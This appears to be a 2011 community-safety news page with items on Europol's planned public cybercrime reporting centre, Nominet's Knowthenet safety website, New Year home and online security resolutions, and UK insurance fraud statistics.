European Police Office want web users to get involved and report internet crimes

Millions of internet users across the EU could be asked to join in the fight against cyber crime.

Rob Wainwright, director of Europol (the European Police Office), briefed the House of Lords EU sub-committee on Home Affairs last week on plans to introduce a European cyber crime centre.

This would include a central online reporting function, through which members of the public could report cybercrimes.

He told peers that directly involving web users in helping to net cyber crime gangs would have a two-fold benefit.?It would "empower citizens not only to look out for themselves but to report criminal activity".

The idea of involving the public is not new and has been used in the US for a number of years. For the past 10 years the public have been able to report cyber crimes to the Internet Crime Complaint Center (IC3); a joint venture between the National White Collar Crime Center and the FBI.

Mr Wainwright said: "For the first time the EU will have a comprehensive overview of reported cyber crime from within its own borders and this could even include, in the future, a component of direct engagement with the public."

The Europol system could potentially go further than the IC3. Plans put forward mean it wouldn't be restricted to victims of cyber crime.

Anyone would who had information would be able to report this. However the plans are still in the very early stages. Although it is hoped that the European cyber crime centre can be set up by 2014, much depends on whether funding can be secured.

Further information

European Law Enforcement Agency: www.europol.europa.eu/

(3rd January 2011)


 

WEB SAFETY SITE LAUNCHES
(Courtesy of : Computer Active, dated November 2010 author Dinah Greek)
www.computeractive.co.uk
Nominet has launched an educational website to help people stay safe online and drive business.

www.knowthenet.org.uk

The not-for-profit organisation responsible for the .uk domain names said the Knowthenet.org.uk site will provide "practical" advice, information and video content for consumers and business users.

For example, the site will carry information security scares, scams and news of the latest dangerous software. Nominet said research it had carried out showed online safety in all areas was an area of major concern for many people.

"In September this year, there were 31,000 Google searches for 'Internet safety', 60,500 searches for 'cyber bullying' and 34,000 searches for 'computer virus'," Nominet said.

"Security risks are also growing, with almost 80,000 people falling victim to internet fraud in the first nine months of 2010 - a 10 per cent jump on last year."

The organisation also said that the library of material on the site covering online safety included a range of topics from password choice and phishing scams to privacy settings on social networks.

Phil Kingsland, Nominet's marketing and communications director, said: "Information is only a click away on the internet. The challenge is that often people don't always know what to trust, or where to go.

"Free, impartial advice is hard to come by. We've launched the Knowthenet.org.uk site to bridge this knowledge gap, addressing concerns and offering impartial, useful advice which gives people the confidence and know-how to do more online."

The site will also point users to other trusted internet resources such as GetSafeOnline and Identitytheft.org.uk for more detailed information.

Nominet said the front page of the website will be updated several times a week with short posts that will provide practical advice for consumers and businesses as media stories break and major new online developments occur. It said people can also follow the site via updates on Twitter, comment on stories and suggest additional topics.

Further information

Get Safe Online : www.getsafeonline.org/

Identity theft prevention : www.identitytheft.org.uk/

Register of UK domain names (websites) : www.nominet.org.uk/

(3rd January 2011)


 

HAPPY NEW YEAR - SOME SUGGESTED RESOLUTIONS

- Test your smoke alarm, replace old batteries, test the unit regularly.
- Always ensure that patio doors are locked correctly.
- Keep computer security software up to date.
- Regularly check bank and credit card statements for fraudulent transactions.
- Shred unwanted bank, credit card and utility statements.
- Check that the tread on your car tyres meet the legal depth.
- Don't respond to unsolicited, unrecognisable originated e-mails (SPAM).
- Don't respond to e-mails from "banks". If they are raising an issue on your account telephone them on a known number. Avoid Phishing.
- If you are away for the night of more, give the impression that you are in by setting up a light controlled by a timer.
- Why not at least think about having that free household security check by the Met Police Safer Neighbourhood Team !

(1st January 2011)


INSURANCE FRAUD COSTS £2.3 MILLION EVERY DAY
(Sky News, dated 29th December 2010 author Michael Burgess)
www.news.sky.com

Insurance companies are uncovering an average of 335 fraudulent claims every day, says a report.

According to the Association of British Insurers, the claims, which are being detected with increasingly sophisticated techniques, are costing £2.3m every day.

The most common type of insurance fraud is home insurance, says the report, with 170 bogus claims made each day.

Fraudulent home insurance claims usually involve people claiming for alleged accidental damage to carpets or furniture - such as spilled red wine or coffee - only for insurers to find the damage was done deliberately.

The second most common type of insurance fraud was motor insurance, with 108 fraudulent claims made each day, costing approximately £1.1m.

Speaking to Sky News, Malcolm Tarling, of the Association of British Insurers, said: "We've had people who have travelled overseas and claimed for stolen cameras and items they've never had."

He said some people also "spill paint and coffee on carpets and then claimed for the complete refurbishment of the home".

One claimant crashed his car during a race at the Nuerburgring race track in Germany, but shipped it back to the UK to claim it was damaged at the side of the road in Britain.

Another policy holder alleged he had sustained a head injury after tripping over a loose paving stone, only for it to emerge he had been hit by a baseball bat during a fight.

Nick Starling, also of the Association of British Insurers, said: "Insurance cheats do not prosper - they can expect to get caught, face problems getting future insurance and risk getting a criminal record."

He added: "The majority of customers are honest and rightly object to subsidising the cheats. Insurance fraud adds and extra £44 to the average UK household's annual insurance bill.

"This is why 2011 will see insurers intensify their war against the cheats to protect their honest customers."

(1st January 2011)